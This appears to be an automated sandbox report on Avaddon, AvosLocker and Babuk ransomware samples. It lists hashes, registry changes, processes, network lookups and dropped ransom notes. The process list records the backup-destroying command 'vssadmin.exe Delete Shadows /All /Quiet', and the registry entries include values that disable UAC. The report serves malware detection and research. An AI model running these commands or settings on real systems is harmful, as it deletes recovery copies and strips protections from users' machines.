| SHA512 | 822271f8f733e6ebbe224b45ce590e5b1e1ffd331825b2c986c23adf7d4a8e387473463f2b9722f9ab4c9064a78f513d1648d0f5ada7c1cbf0199ca41924d493 |
C:\Users\Admin\README.a8e86c8e.TXT
| MD5 | d4e176b40c4ea17f4870c34fad926d6e |
| SHA1 | 2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0 |
| SHA256 | 7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c |
| SHA512 | feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240705-en
Max time kernel
1799s
Max time network
1445s
Command Line
Signatures
Avaddon
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Deletes shadow copies
Renames multiple (257) files with added filename extension
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | \??\Z:\$RECYCLE.BIN\S-1-5-21-2660163958-4080398480-1122754539-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Enumerates connected drives
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\bckgrd.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\Admin\\bckgrd.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 95.101.129.43:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 184.26.45.61:80 | x2.c.lencr.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabEC16.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarECE3.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0005f8884a49a763ee00da5e7a16f5db |
| SHA1 | 6293b3f20f11ae57677cc856217b02e1585e9f7b |
| SHA256 | bcabd2f23f21dcef112d089b684f405ae75d432908b6916d34745802cce6629e |
| SHA512 | fa8be5bc941da4f3f9e96abe0fb87da71f0e174bd03ba446c03ef403d122a823a8fb48f780df6399f3c08519ba415b1bdbd2ac9ec98ab26cf432d9ba9b7dc1be |
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\451311-readme.html
| MD5 | 75b9edf1bf9b43866e75b3311efca520 |
| SHA1 | bf557bb3a19175cfcd75e3bf376697dd88f64afd |
| SHA256 | af371ec997b4777fc9f1cabfb3fabb2b94b9c7682d0934fc542686c15b070c22 |
| SHA512 | e5df3a7c46dfe17ba613697c1f9247e56767703873f42fa0fb6d11bf660d78c13183c2a03149e6fa42d86f38298b6f3be9ab3e29c31eea42210085db2f50eada |
C:\Users\Admin\Documents\RestorePop.xlsx
| MD5 | 8fb256cf5b864425c54c63bf966e6224 |
| SHA1 | 3082083ac78ddacd81ad84725d64d0b3ab573f35 |
| SHA256 | b42d82a0d734d9bb09ee8aca3dc345e7fd7746b2de24a0fd7c57a1b0d90bda68 |
| SHA512 | ea40097f6ad7d0bf17435cdb9b1088114a2dcf4f450b3bc4090916a7aabbf93c0b0130018d9de4d20800f2fb428303dd85053e6de63c3e2ec7c4f5370e84ce1f |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1757s
Max time network
1160s
Command Line
Signatures
Avoslocker Ransomware
Renames multiple (66) files with added filename extension
Suspicious behavior: EnumeratesProcesses
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
Files
C:\Recovery\GET_YOUR_FILES_BACK.txt
| MD5 | 0237b63f764204e00d7242cc4d908271 |
| SHA1 | 9d88e59463e2a963bea95d6a2cc5383e922f2f27 |
| SHA256 | 7bee0aff7241590f5bd35727a1a544a492b7533f1acba685611dd269078d1857 |
| SHA512 | 0daec31046c2704b30760f7aecc944f9591cdf22511e5e9276f3dbc376cc60b04853c3e25abca2e754aeaaaac49c264c7d89d418c832c8275fb5484d51a99b3e |
Analysis: behavioral8
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1792s
Max time network
1151s
Command Line
Signatures
Babuk Locker
Deletes shadow copies
Renames multiple (174) files with added filename extension
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | N/A |
Enumerates connected drives
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
